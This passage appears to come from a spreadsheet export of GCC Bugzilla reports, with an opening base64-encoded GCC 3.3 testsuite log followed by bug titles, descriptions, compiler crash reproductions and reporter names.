 ZXMJNQ0KIyBvZiB1bmV4cGVjdGVkIHN1Y2Nlc3NlcwkyDQojIG9mIGV4cGVjdGVkIGZhaWx1
 cmVzCQk5Ng0KIyBvZiB1bnJlc29sdmVkIHRlc3RjYXNlcwkyDQojIG9mIHVudGVzdGVkIHRl
 c3RjYXNlcwkJMjMNCiMgb2YgdW5zdXBwb3J0ZWQgdGVzdHMJCTE4DQovaG9tZS9kb2tvL3Nu
 YXAvZ2NjLXNuYXBzaG90LTIwMDMwNDI0L2J1aWxkL2djYy90ZXN0c3VpdGUvLi4vZysrIHZl
 cnNpb24gMy4zIDIwMDMwNDI0IChwcmVyZWxlYXNlKQ0NCg0KCQk9PT0gZzc3IHRlc3RzID09
 PQ0KDQoNClJ1bm5pbmcgdGFyZ2V0IHVuaXgNCg0KCQk9PT0gZzc3IFN1bW1hcnkgPT09DQoN
 CiMgb2YgZXhwZWN0ZWQgcGFzc2VzCQkxNjg2DQojIG9mIHVuc3VwcG9ydGVkIHRlc3RzCQk4
 DQovaG9tZS9kb2tvL3NuYXAvZ2NjLXNuYXBzaG90LTIwMDMwNDI0L2J1aWxkL2djYy90ZXN0
 c3VpdGUvLi4vZzc3IHZlcnNpb24gMy4zIDIwMDMwNDI0IChwcmVyZWxlYXNlKQ0NCg0KCQk9
 PT0gZ2NjIHRlc3RzID09PQ0KDQoNClJ1bm5pbmcgdGFyZ2V0IHVuaXgNCkZBSUw6IGdjYy5k
 Zy8yMDAyMDEwMy0xLmMgc2Nhbi1hc3NlbWJsZXItbm90IExDDQpGQUlMOiBnY2MuZGcvMjAw
 MjAxMTgtMS5jIGV4ZWN1dGlvbiB0ZXN0DQpGQUlMOiBnY2MuZGcvYWx0aXZlYy01LmMgKHRl
 c3QgZm9yIGV4Y2VzcyBlcnJvcnMpDQpGQUlMOiBnY2MuZGcvZHVmZi0yLmMgKHRlc3QgZm9y
 IGV4Y2VzcyBlcnJvcnMpDQoNCgkJPT09IGdjYyBTdW1tYXJ5ID09PQ0KDQojIG9mIGV4cGVj
 dGVkIHBhc3NlcwkJMjEyNDMNCiMgb2YgdW5leHBlY3RlZCBmYWlsdXJlcwk0DQojIG9mIGV4
 cGVjdGVkIGZhaWx1cmVzCQk2Nw0KIyBvZiB1bnN1cHBvcnRlZCB0ZXN0cwkJMTUzDQovaG9t
 ZS9kb2tvL3NuYXAvZ2NjLXNuYXBzaG90LTIwMDMwNDI0L2J1aWxkL2djYy94Z2NjIHZlcnNp
 b24gMy4zIDIwMDMwNDI0IChwcmVyZWxlYXNlKQ0NCg0KCQk9PT0gb2JqYyB0ZXN0cyA9PT0N
 Cg0KDQpSdW5uaW5nIHRhcmdldCB1bml4DQpGQUlMOiBvYmpjLmRnL25hbWluZy0xLm0gICh0
 ZXN0IGZvciBlcnJvcnMsIGxpbmUgMjApDQpGQUlMOiBvYmpjLmRnL25hbWluZy0xLm0gKHRl
 c3QgZm9yIGV4Y2VzcyBlcnJvcnMpDQpGQUlMOiBvYmpjLmRnL25hbWluZy0yLm0gICh0ZXN0
 IGZvciBlcnJvcnMsIGxpbmUgNykNCkZBSUw6IG9iamMuZGcvbmFtaW5nLTIubSAodGVzdCBm
 b3IgZXhjZXNzIGVycm9ycykNCg0KCQk9PT0gb2JqYyBTdW1tYXJ5ID09PQ0KDQojIG9mIGV4
 cGVjdGVkIHBhc3NlcwkJMTE0OQ0KIyBvZiB1bmV4cGVjdGVkIGZhaWx1cmVzCTQNCi9ob21l
 L2Rva28vc25hcC9nY2Mtc25hcHNob3QtMjAwMzA0MjQvYnVpbGQvZ2NjL3hnY2MgdmVyc2lv
 biAzLjMgMjAwMzA0MjQgKHByZXJlbGVhc2UpDQ0KDQoJCT09PSBsaWJqYXZhIHRlc3RzID09
 PQ0KDQoNClJ1bm5pbmcgdGFyZ2V0IHVuaXgNCkZBSUw6IEFycmF5XzMgLU8gZXhlY3V0aW9u
 IC0gc291cmNlIGNvbXBpbGVkIHRlc3QNCldBUk5JTkc6IHByb2dyYW0gdGltZWQgb3V0Lg0K
 RkFJTDogU3luY1Rlc3QgZXhlY3V0aW9uIC0gZ2lqIHRlc3QNCldBUk5JTkc6IHByb2dyYW0g
 dGltZWQgb3V0Lg0KRkFJTDogU3luY1Rlc3QgZXhlY3V0aW9uIC0gZ2lqIHRlc3QNCg0KCQk9
 PT0gbGliamF2YSBTdW1tYXJ5ID09PQ0KDQojIG9mIGV4cGVjdGVkIHBhc3NlcwkJMjkzNw0K
 IyBvZiB1bmV4cGVjdGVkIGZhaWx1cmVzCTMNCiMgb2YgZXhwZWN0ZWQgZmFpbHVyZXMJCTE2
 DQojIG9mIHVudGVzdGVkIHRlc3RjYXNlcwkJMTUNCgkJPT09IGxpYnN0ZGMrKy12MyB0ZXN0
 cyA9PT0NCg0KDQpSdW5uaW5nIHRhcmdldCB1bml4DQpYUEFTUzogMjJfbG9jYWxlL2NvbGxh
 dGVfYnluYW1lLmNjIGV4ZWN1dGlvbiB0ZXN0DQpYUEFTUzogMjJfbG9jYWxlL2NvbGxhdGVf
 bWVtYmVyc19jaGFyLmNjIGV4ZWN1dGlvbiB0ZXN0DQpYUEFTUzogMjJfbG9jYWxlL2NvbGxh
 dGVfbWVtYmVyc193Y2hhcl90LmNjIGV4ZWN1dGlvbiB0ZXN0DQpYUEFTUzogMjJfbG9jYWxl
 L2N0eXBlX2lzX2NoYXIuY2MgZXhlY3V0aW9uIHRlc3QNClhQQVNTOiAyMl9sb2NhbGUvY3R5
 cGVfaXNfd2NoYXJfdC5jYyBleGVjdXRpb24gdGVzdA0KWFBBU1M6IDIyX2xvY2FsZS9tZW1i
 ZXJzLmNjIGV4ZWN1dGlvbiB0ZXN0DQpYUEFTUzogMjJfbG9jYWxlL21lc3NhZ2VzX2J5bmFt
 ZS5jYyBleGVjdXRpb24gdGVzdA0KWFBBU1M6IDIyX2xvY2FsZS9tZXNzYWdlc19tZW1iZXJz
 X2NoYXIuY2MgZXhlY3V0aW9uIHRlc3QNClhQQVNTOiAyMl9sb2NhbGUvbW9uZXlwdW5jdF9i
 eW5hbWUuY2MgZXhlY3V0aW9uIHRlc3QNClhQQVNTOiAyMl9sb2NhbGUvbW9uZXlwdW5jdF9t
 ZW1iZXJzX2NoYXIuY2MgZXhlY3V0aW9uIHRlc3QNClhQQVNTOiAyMl9sb2NhbGUvbW9uZXlw
 dW5jdF9tZW1iZXJzX3djaGFyX3QuY2MgZXhlY3V0aW9uIHRlc3QNClhQQVNTOiAyMl9sb2Nh
 bGUvbnVtcHVuY3RfYnluYW1lLmNjIGV4ZWN1dGlvbiB0ZXN0DQpYUEFTUzogMjJfbG9jYWxl
 L251bXB1bmN0X21lbWJlcnNfY2hhci5jYyBleGVjdXRpb24gdGVzdA0KWFBBU1M6IDIyX2xv
 Y2FsZS9udW1wdW5jdF9tZW1iZXJzX3djaGFyX3QuY2MgZXhlY3V0aW9uIHRlc3QNCg0KCQk9
 PT0gbGlic3RkYysrLXYzIFN1bW1hcnkgPT09DQoNCiMgb2YgZXhwZWN0ZWQgcGFzc2VzCQk0
 NTMNCiMgb2YgdW5leHBlY3RlZCBzdWNjZXNzZXMJMTQNCiMgb2YgZXhwZWN0ZWQgZmFpbHVy
 ZXMJCTE0DQoNCkNvbXBpbGVyIHZlcnNpb246IDMuMyAyMDAzMDQyNCAocHJlcmVsZWFzZSkg
 DQpQbGF0Zm9ybTogcG93ZXJwYy11bmtub3duLWxpbnV4LWdudQ0KY29uZmlndXJlIGZsYWdz
 OiAtLWhvc3Q9cG93ZXJwYy1saW51eCAtdiAtLWVuYWJsZS1sYW5ndWFnZXM9YyxjKyssamF2
 YSxmNzcsb2JqYyAtLXByZWZpeD0vdXNyL2xpYi9nY2Mtc25hcHNob3QgLS1pbmZvZGlyPS9z
 aGFyZS9pbmZvIC0tbWFuZGlyPS9zaGFyZS9tYW4gLS1lbmFibGUtc2hhcmVkIC0td2l0aC1z
 eXN0ZW0temxpYiAtLWVuYWJsZS1ubHMgLS13aXRob3V0LWluY2x1ZGVkLWdldHRleHQgLS1l
 bmFibGUtX19jeGFfYXRleGl0IC0tZW5hYmxlLWNsb2NhbGU9Z251IC0tZW5hYmxlLWphdmEt
 Z2M9Ym9laG0gLS1lbmFibGUtamF2YS1hd3Q9eGxpYiAtLXdpdGgtY3BwLWluc3RhbGwtZGly
 PWJpbiAtLWVuYWJsZS1tdWx0aWxpYnMgLS1lbmFibGUtb2JqYy1nYyAtLWRpc2FibGUtbXVs
 dGlsaWINCkJPT1RfQ0ZMQUdTPS1PMiANCg0KDQpCdWlsZCBEZXBlbmRlbmNpZXM6DQpEZXNp
 cmVkPVVua25vd24vSW5zdGFsbC9SZW1vdmUvUHVyZ2UvSG9sZA0KfCBTdGF0dXM9Tm90L0lu
 c3RhbGxlZC9Db25maWctZmlsZXMvVW5wYWNrZWQvRmFpbGVkLWNvbmZpZy9IYWxmLWluc3Rh
 bGxlZA0KfC8gRXJyPz0obm9uZSkvSG9sZC9SZWluc3QtcmVxdWlyZWQvWD1ib3RoLXByb2Js
 ZW1zIChTdGF0dXMsRXJyOiB1cHBlcmNhc2U9YmFkKQ0KfHwvIE5hbWUgICAgICAgICAgIFZl
 cnNpb24gICAgICAgIERlc2NyaXB0aW9uDQorKystPT09PT09PT09PT09PT0tPT09PT09PT09
 PT09PT0tPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCmlp
 ICBiaW51dGlscyAgICAgICAyLjEzLjkwLjAuMTgtMSBUaGUgR05VIGFzc2VtYmxlciwgbGlu
 a2VyIGFuZCBiaW5hcnkgdXRpbGl0aQ0KaWkgIGxpYmM2LWRldiAgICAgIDIuMy4xLTE0ICAg
 ICAgIEdOVSBDIExpYnJhcnk6IERldmVsb3BtZW50IExpYnJhcmllcyBhbmQgSGVhDQoNCg0K
 UGF0Y2hlcyB0aGF0IERlYmlhbiBhcHBsaWVkIGluIHRoaXMgdmVyc2lvbjoNCg0KYXV0b3Jl
 Y29uZjoNCiAgYXV0b3JlY29uZiBzZXZlcmFsIGRpcmVjdG9yaWVzIGZvciBwcm9wZXIgbWlw
 c2VuIGxpYnRvb2wgc3VwcG9ydA0KDQpsaWJvYmpjOg0KICBGaW5kIGdjLmggaGVhZGVyIGlu
 IC91c3IvaW5jbHVkZS9nYyBmb3IgLS1lbmFibGUtb2JqYy1nYyBlbmFibGVkIGJ1aWxkcy4=
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-36594</t>
  </si>
  <si>
    <t>[4.4 Regression] multiple regressions on powerpc at rev.136976</t>
  </si>
  <si>
    <t>Multiple regressions have appeared at revision 136976 (last known working 136953) see:
http://gcc.gnu.org/ml/gcc-testresults/2008-06/msg01644.html
http://gcc.gnu.org/ml/gcc-testresults/2008-06/msg01650.html
A typical failure is:
[karma] f90/bug% /opt/gcc/gcc4.4w/bin/gcc /opt/gcc/_gcc_clean/gcc/testsuite/gcc.c-torture/execute/nestfunc-5.c
/opt/gcc/_gcc_clean/gcc/testsuite/gcc.c-torture/execute/nestfunc-5.c: In function 'do_goto':
/opt/gcc/_gcc_clean/gcc/testsuite/gcc.c-torture/execute/nestfunc-5.c:11: internal compiler error: Bus error</t>
  </si>
  <si>
    <t>GCC-12592</t>
  </si>
  <si>
    <t>Http requests use \n instead of \r\n</t>
  </si>
  <si>
    <t>/gcc/libjava/gnu/gcj/protocol/http/Connection.java should use \r\n for http
request. Otherwise it's not http-compliant and certain servers(iis6) don't
understand those requests.
http://glek.net/~taras/Connection.java.diff should fix this.</t>
  </si>
  <si>
    <t>taras.judge</t>
  </si>
  <si>
    <t>GCC-56678</t>
  </si>
  <si>
    <t xml:space="preserve">[c++11] non-uglified name in </t>
  </si>
  <si>
    <t>This fails in C++11 mode:
#define T ***
#include 
int main() { }
This has been broken since at least 4.4 due to this non-uglified T
    template
      struct __is_ratio
      : std::false_type
      { }</t>
  </si>
  <si>
    <t>GCC-47318</t>
  </si>
  <si>
    <t>_mm256_maskstore_pd has wrong prototype</t>
  </si>
  <si>
    <t>The AVX functions _mm256_maskstore_pd and _mm_maskstore_pd have the wrong prototype in gcc 4.5.2 and gcc 4.6.0 as declared in avxintrin.h. According to Intel (e.g. ) the mask argument should have type __m256i whereas gcc declares it as __m256d.</t>
  </si>
  <si>
    <t>GCC-10804</t>
  </si>
  <si>
    <t>[3.4 regression] missing implicit instantiation of template static methods</t>
  </si>
  <si>
    <t>Linking fails on the following file:
--8&lt;--
template
struct A
{
  A() { const void (*a)() = foo }
  static const void foo() {}
}
int main(int argc char *argv[])
{
  A a
}
--8&lt;--
with the error:
/tmp/ccube68X.o(.gnu.linkonce.t._ZN1AIiEC1Ev+0x9): In function `A::A[in-charge]()':
: undefined reference to `A::foo()'
collect2: ld returned 1 exit status
There is no problem with GCC 3.2.
Release:
gcc version 3.4 20030512 (experimental)
Environment:
i686-pc-linux-gnu
How-To-Repeat:
c++ implicit-instantiation.cc
Here's the output of nm with GCC 3.4:
         U A::foo()
00000000 W A::A[in-charge]()
00000000 T main
and here's the output with GCC 3.2
00000000 W A::foo()
00000000 W A::A[in-charge]()
         U __gxx_personality_v0
00000000 T main
Notice that GCC 3.4 did DTRT with the constructor.  If I replace the use of foo in the code with a direct method call then there's no problem either.</t>
  </si>
  <si>
    <t>harinath</t>
  </si>
  <si>
    <t>GCC-25833</t>
  </si>
  <si>
    <t>ICE with -O -ftree-vectorize -funroll-loops</t>
  </si>
  <si>
    <t>On sh64-elf the program
void
foo (float *dest_y const float *abase_n float bbase_yn
     int count int xcount int ycount)
{
  int x y n
  for (y = 0 y &lt; ycount y++)
    for (n = 0 n &lt; count n++)
      for (x = 0 x &lt; xcount x++)
	dest_y[x] += abase_n[x] * bbase_yn
}
causes the ICE
foo.c:11: error: unrecognizable insn:
(insn 117 116 118 5 (set (reg:V2SF 300)
        (vec_select:V2SF (vec_concat:V2SF (vec_select:SF (reg:V2SF 232)
                    (parallel [
                            (const_int 1 [0x1])
                        ]))
                (mult:SF (vec_select:SF (reg:V2SF 209 [ vect_cst_.50 ])
                        (parallel [
                                (const_int 0 [0x0])
                            ]))
                    (vec_select:SF (reg:V2SF 233)
                        (parallel [
                                (const_int 0 [0x0])
                            ]))))
            (parallel [
                    (const_int 1 [0x1])
                    (const_int 0 [0x0])
                ]))) -1 (insn_list:REG_DEP_TRUE 116 (nil))
    (expr_list:REG_DEAD (reg:V2SF 232)
        (nil)))
foo.c:11: internal compiler error: in extract_insn at recog.c:2084
on 4.2 compiler with -O -ftree-vectorize -funroll-loops.</t>
  </si>
  <si>
    <t>GCC-39297</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] gcc.dg/tree-ssa/loop-31.c</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 144413 gave
FAIL: gcc.dg/tree-ssa/loop-31.c scan-tree-dump-times optimized  \+ 2 1
Revision 144404 is OK. Revision 144405:
http://gcc.gnu.org/ml/gcc-cvs/2009-02/msg00572.html
may be the cause.</t>
  </si>
  <si>
    <t>GCC-51400</t>
  </si>
  <si>
    <t>[c++0x] ICE with constexpr and attribute noreturn</t>
  </si>
  <si>
    <t>The following valid(?) code snippet triggers an ICE since GCC 4.6.0:
=======================================================
constexpr int (*f)() __attribute__((noreturn)) = 0
=======================================================
bug.cc:1:46: internal compiler error: in start_decl at cp/decl.c:4515
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-57352</t>
  </si>
  <si>
    <t>internal compiler error in cp_parser_abort_tentative_parse at cp/parser.c:22878</t>
  </si>
  <si>
    <t>gcc 4.7.2 crashes on the following code:
struct x
{
    operator class {} ()
}
With error message:
13.cpp:3:21: internal compiler error: in cp_parser_abort_tentative_parse at cp/parser.c:22878
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>vanyacpp</t>
  </si>
  <si>
    <t>GCC-5601</t>
  </si>
  <si>
    <t>stl_alloc.h:288: parse error before `[' token When using gcc-3.0.4pre today's cvs</t>
  </si>
  <si>
    <t>This bug is for long times.
libstdc++-v3/include/bits/stl_alloc.h:288:  static _Obj* __STL_VOLATILE _S_free_list[] 
libstdc++-v3/include/bits/stl_config.h:554:#   define __STL_VOLATILE volatile
but it isn't install stl_config.h 
Stable problem When compiling db4.
Release:
unknown
Environment:
linuxppcgcc-3.0.4preCVSbinutils-2.11.93
How-To-Repeat:
stable problem when compiling db4</t>
  </si>
  <si>
    <t>k_fukui</t>
  </si>
  <si>
    <t>GCC-1787</t>
  </si>
  <si>
    <t>ICE on using ::std</t>
  </si>
  <si>
    <t>I also got the same ICE with gcc version 2.95.2 20000220 (Debian GNU/Linux) and DJGPP v2.03's gcc 2.95.x . The error messages from the online compiler are:
GCC Output
These are the results of processing your source code with the following command:
g++ [input]
Exit code: 256
Messages:
/tmp/@31461.7.cc:4: Internal error #382.
/tmp/@31461.7.cc:4: Internal compiler error in validate_nonmember_using_decl 
   at cp/decl2.c:5121
Please submit a full bug report.
 See for instructions.
Release:
gcc version 2.97 20010120 (experimental) 3.0 20010305
Environment:
http://www.codesourcery.com/gcc-compile.shtml
How-To-Repeat:
The C++ source code (3 lines no includes) is:
namespace std {}
using ::std</t>
  </si>
  <si>
    <t>GCC-4185</t>
  </si>
  <si>
    <t>non functionality of string member (reserve)</t>
  </si>
  <si>
    <t>I need to reduce memory usage in a large program.
Most of my C++ strings are just 1 or 2 characters in length
but the default capacity is 16. I therefore want to use 
the reserve() string member function.
The reserve() member function works for vector container but 
not strings (no affect).
I am unable to run on gcc3.0 as I use gtk+ and a bug was posted
on the gtk+ site to say not to migrate yet.
Release:
gcc version 2.95.2 19991024 (release) AND gcc version egcs-2.91.66 19990314/Linux
Environment:
Solarirs 2.6 &amp; linux
How-To-Repeat:
Run the small g++ example:
===================================
/////////////////////////////////////////////////////////////////
// STL Class Templates
#include 
#include 
#include 
#include 
using namespace std 
///////////////////////////////
void main()
{
 //Define a vector string
 vector v
 //define a C++ string
 string ThisString 
 ThisString = A
 //set the capacity of the string to 1000
 ThisString.reserve(1000)
 //Set the capavity of the vector to 1000
 v.reserve(1000)
 //v.size reports back 0 == correct
 cout &lt;&lt; v.size() &lt;&lt; endl 
 //v.capacity reports back 1000 == correct
 cout &lt;&lt; v.capacity() &lt;&lt; endl 
 //ThisString.size() reports back 1 == correct
 cout &lt;&lt; ThisString.size() &lt;&lt; endl 
 //ThisString.capacity() reports back 16 NOT 1000 ==&gt; NOT correct
 //This is the default value as if reserve has not been run.
 cout &lt;&lt; ThisString.capacity() &lt;&lt; endl 
}
===================================</t>
  </si>
  <si>
    <t>GCC-11815</t>
  </si>
  <si>
    <t>ICE with missing template keyword</t>
  </si>
  <si>
    <t>This is a spin-off from PR 6023:
Consider the following invalid code (which is missing a template
keyword righ before X in line 5):
-------------------------------------------
template  struct A
template  struct B
{
    template  void foo(const typename A::X::Y
    template  void bar(U x) { foo(x) }
}
-------------------------------------------
Compiling this with mainline one gets the following error message:
  bug.cc:5: error: expected primary-expression
  bug.cc:5: error: expected primary-expression
  bug.cc:5: error: `::Y' has not been declared
  bug.cc:5: error: expected primary-expression
  bug.cc:5: error: variable or field `foo' declared void
  bug.cc:5: error: ISO C++ forbids initialization of member `foo'
  bug.cc:5: error: making `foo' static
  bug.cc:5: error: ISO C++ forbids in-class initialization of non-const static 
     member `foo'
  bug.cc:5: error: template declaration of `int B::foo'
  bug.cc: In member function `void B::bar(U)':
  bug.cc:6: internal compiler error: in cp_parser_template_id at cp/parser.c:
     7516
  Please submit a full bug report [etc.]
This is rewarded with three keywords: ice-on-invalid-code
error-recovery (since the ICE happens after a error message)
and diagnostic (since the error message is not very helpful -
we are missing just one template remember).
Nevertheless this is actually an improvement since the code was wrongly
accepted by gcc 2.95.x - 3.3.x.
Btw by varying the declaration of foo (i.e. removing &amp; const or ::Y)
one can change the error message a little.</t>
  </si>
  <si>
    <t>GCC-5037</t>
  </si>
  <si>
    <t>Multithreaded read access to strings not threadsafe on Solaris/Sparc</t>
  </si>
  <si>
    <t>The attached program creates two threads and passes a _copy_ 
of a string to them through a queue.  Each thread asserts
that the size of the string passed is greater than 0.  Every
10K iterations it'll output status.  It passes if it is 
able to do this 1M times.  This program runs to completion 
on a multiprocessor linux system a multiprocessor
Solarisx86 system and a single processor Solaris-sparc 
system.  It fails in two ways on a multiprocessor sparc box:
1)  If compiled without -D__USE_MALLOC it gives a bus error
somewhere in the alloc templates:
[craigk:~/tmp/bugger]$ ./bugger
Processed: 0
Bus Error (core dumped)
2)  If compiled with -D__USE_MALLOC it fails the assertion:
[craigk:~/tmp/bugger]$ ./bugger
Processed: 0
Processed: 10000
Assertion failed: s.size() &gt; 0 file bugger.cpp line 35
Abort (core dumped)
Release:
gcc version 3.0
Environment:
Solaris 2.7 or 2.8 on multiprocessor sparc.
How-To-Repeat:
Compile on a dual proc solaris-sparc box and run it.</t>
  </si>
  <si>
    <t>ckaes</t>
  </si>
  <si>
    <t>GCC-53914</t>
  </si>
  <si>
    <t>poor code generated for offset addressing on ppc32</t>
  </si>
  <si>
    <t>/* -m32 -O2 code for f5 thru f12 store y to a stack slot load that to
   a fpr then store the fpr.  The other function store y directly
   from the input r5 and r6 as expected.  */
void f1 (void *x long long y) { *(long long *) (x + 32767) = y }
void f2 (void *x long long y) { *(long long *) (x + 32766) = y }
void f3 (void *x long long y) { *(long long *) (x + 32765) = y }
void f4 (void *x long long y) { *(long long *) (x + 32764) = y }
void f5 (void *x long long y) { *(long long *) (x + 32763) = y }
void f6 (void *x long long y) { *(long long *) (x + 32762) = y }
void f7 (void *x long long y) { *(long long *) (x + 32761) = y }
void f8 (void *x long long y) { *(long long *) (x + 32760) = y }
void f9 (void *x long long y) { *(long long *) (x + 32759) = y }
void f10 (void *x long long y) { *(long long *) (x + 32758) = y }
void f11 (void *x long long y) { *(long long *) (x + 32757) = y }
void f12 (void *x long long y) { *(long long *) (x + 32756) = y }
void f13 (void *x long long y) { *(long long *) (x + 32755) = y }
void f14 (void *x long long y) { *(long long *) (x + 32754) = y }
void f15 (void *x long long y) { *(long long *) (x + 32753) = y }
void f16 (void *x long long y) { *(long long *) (x + 32752) = y }
void f17 (void *x long long y) { *(long long *) (x + 32751) = y }
void f18 (void *x long long y) { *(long long *) (x + 32750) = y }
void f19 (void *x long long y) { *(long long *) (x + 32749) = y }
void f20 (void *x long long y) { *(long long *) (x + 32748) = y }</t>
  </si>
  <si>
    <t>GCC-7220</t>
  </si>
  <si>
    <t>g++ 3.1: basic_istream::ignore(0delimiter) issue.</t>
  </si>
  <si>
    <t>basic_istream::ignore(0delimiter) extracts delimiter if it (delimiter) is at stream read position without regard to first parameter == 0. In case delimiter isn`t at read position ignore(0delimiter) do nothing and this is correct.
C++ ISO|IEC 27.6.1.3-24 declare that ignore(n...) should extract n symbols in case n  != numeric_limits::max(). This condition is true for n = 0
See testcase attached.
Release:
g++ 3.1
Environment:
Red Hat Linux release 7.2 g++ v3.1
How-To-Repeat:
Compile testcase with g++ 3.1 and run it. You`ll see some failed messages.</t>
  </si>
  <si>
    <t>johnb</t>
  </si>
  <si>
    <t>GCC-45774</t>
  </si>
  <si>
    <t>gcc-bugs mail subject issue</t>
  </si>
  <si>
    <t>The subject of gcc-bugs (and presumably other too) mails now looks like:
[Bug 45772] (web) New: Bugzilla doesn't have enabled voting yet it appears at few places
instead of older
[Bug web/45772] New: Bugzilla doesn't have enabled voting yet it appears at few places
I'd say the older form was more useful the component/bugnumber form is what we use in ChangeLog entries and so it is easier to cut'n'paste it directly from the gcc-bugs mails.</t>
  </si>
  <si>
    <t>GCC-46101</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in build_abbrev_table at dwarf2out.c:10333 with -feliminate-dwarf2-dups -g</t>
  </si>
  <si>
    <t>Created attachment 22097
reduced testcase
Compiler output:
$ gcc -feliminate-dwarf2-dups -g pr46101.C 
pr46101.C:6:4: internal compiler error: in build_abbrev_table at dwarf2out.c:10333
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165719 - crash
r161659 - crash
r159696 - OK
4.5 r163761 - OK</t>
  </si>
  <si>
    <t>GCC-28942</t>
  </si>
  <si>
    <t>[4.2 Regression] Dependent deconstrcutors</t>
  </si>
  <si>
    <t>we just reject now but it is
valid code as far as I can tell:
template
  struct bin_search_tree_data_ 
{
  typedef typename other::node node
  typedef node *node_pointer
  ~bin_search_tree_data_()
  {
    m_p_head-&gt;~node()
  }
  node_pointer m_p_head
}
struct blowup
{
  typedef int node
}
bin_search_tree_data_  r
------------------------------ Here is one that ICEs also and closer to
the original code:
template
  struct bin_search_tree_data_
{
  typedef typename other::node node
  typedef node *node_pointer
  ~bin_search_tree_data_()
  {
    m_p_head-&gt;~node()
  }
  node_pointer m_p_head
}
struct blowup2{}
struct blowup
{
  typedef blowup2 node
}
bin_search_tree_data_  r
------
I am creating this after 15 hours of no activity on fixing the problem.</t>
  </si>
  <si>
    <t>GCC-64029</t>
  </si>
  <si>
    <t>[4.9 Regression] const int ( results in internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>Here is a single line program that recreates the bug:
int main() {  const int (  return 0 }
-------------- g++ diagnostics follows ----------------------------
g++ -std=c++11 -Wall -Wextra -c usearr1.cpp
usearr1.cpp: In function â€˜int main()â€™:
usearr1.cpp:4:15: warning: unused variable â€˜inâ€™ [-Wunused-variable]
   const int (
               ^
usearr1.cpp:4:30: internal compiler error: Segmentation fault
   const int (
                              ^
0x855784a crash_signal
	.././gcc-4.9.1/gcc/toplev.c:337
0x83e6aca gimplify_decl_expr
	.././gcc-4.9.1/gcc/gimplify.c:1359
0x83e6aca gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	.././gcc-4.9.1/gcc/gimplify.c:7820
0x83e9c17 gimplify_stmt(tree_node** gimple_statement_base**)
	.././gcc-4.9.1/gcc/gimplify.c:5373
0x83e7904 gimplify_cleanup_point_expr
	.././gcc-4.9.1/gcc/gimplify.c:5149
0x83e7904 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	.././gcc-4.9.1/gcc/gimplify.c:7990
0x83e9c17 gimplify_stmt(tree_node** gimple_statement_base**)
	.././gcc-4.9.1/gcc/gimplify.c:5373
0x83e81fc gimplify_statement_list
	.././gcc-4.9.1/gcc/gimplify.c:1432
0x83e81fc gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	.././gcc-4.9.1/gcc/gimplify.c:8042
0x83e9c17 gimplify_stmt(tree_node** gimple_statement_base**)
	.././gcc-4.9.1/gcc/gimplify.c:5373
0x83ea4a8 gimplify_bind_expr
	.././gcc-4.9.1/gcc/gimplify.c:1099
0x83e784e gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	.././gcc-4.9.1/gcc/gimplify.c:7824
0x83e9c17 gimplify_stmt(tree_node** gimple_statement_base**)
	.././gcc-4.9.1/gcc/gimplify.c:5373
0x83e81fc gimplify_statement_list
	.././gcc-4.9.1/gcc/gimplify.c:1432
0x83e81fc gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
	.././gcc-4.9.1/gcc/gimplify.c:8042
0x83e9c17 gimplify_stmt(tree_node** gimple_statement_base**)
	.././gcc-4.9.1/gcc/gimplify.c:5373
0x83eaaba gimplify_body(tree_node* bool)
	.././gcc-4.9.1/gcc/gimplify.c:8734
0x83eada0 gimplify_function_tree(tree_node*)
	.././gcc-4.9.1/gcc/gimplify.c:8887
0x82e3cf8 analyze_function
	.././gcc-4.9.1/gcc/cgraphunit.c:649
0x82e4c86 analyze_functions
	.././gcc-4.9.1/gcc/cgraphunit.c:1017
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>narayan_behera</t>
  </si>
  <si>
    <t>GCC-5070</t>
  </si>
  <si>
    <t>[powerpc-darwin] parsing gcc-**/gcc/builtin-attr.def</t>
  </si>
  <si>
    <t>Problem during the parsing of gcc-**/gcc/builtin-attr.def
the argument 1_0 is understood as 10 or something like
that (definition of DEF_FORMAT_ATTRIBUTE).
when the problem is fixed (see below) it builds all stage1
and then fails (but that's an other story).
Release:
snapshots gcc20011210 and gcc20011203
Environment:
mac powerpc darwin.
How-To-Repeat:
make bootstrap on darwin with cc compiler:
cc -v
Reading specs from /usr/libexec/gcc/darwin/ppc/2.95.2/specs
Apple Computer Inc. version gcc-932.1 based on gcc version 2.95.2 19991024 (release)</t>
  </si>
  <si>
    <t>ablondel</t>
  </si>
  <si>
    <t>GCC-2563</t>
  </si>
  <si>
    <t>g++ does not apply trivial conversions for operator overloading resolution</t>
  </si>
  <si>
    <t>g++ does not seem to apply a conversion from an integer
to a double when resolving operator overloading.
The how-to-repeat section contains a very short program
which fails to compile with error message
test.cpp: In function `int main(int char **)':
test.cpp:18: no match for `Vector &amp; / int'
However an operator 'Vector &amp; / const double' 
is defined which should (I think) be enough.
Release:
gcc version 2.95.3 20010315 (Debian release)
How-To-Repeat:
Feed g++ the following short program. It will complain
about a / operator not defined which I think is incorrect.
--- EXAMPLE START ---
template 
class Vector {
private:
        NT data
}
template  Vector
operator/ (const Vector &amp;v const NT n)
{
}
int main (int argc char *argv[])
{
        Vector a b
        b = a/2
}
--- EXAMPLE END ---</t>
  </si>
  <si>
    <t>spacek</t>
  </si>
  <si>
    <t>GCC-8408</t>
  </si>
  <si>
    <t>[mainline regression] simple legal c program ice in fixup_var_refs_1 at function.c:1938</t>
  </si>
  <si>
    <t>a simple c legal program ice in fixup_var_refs_1 at function.c:1938 with -O1:
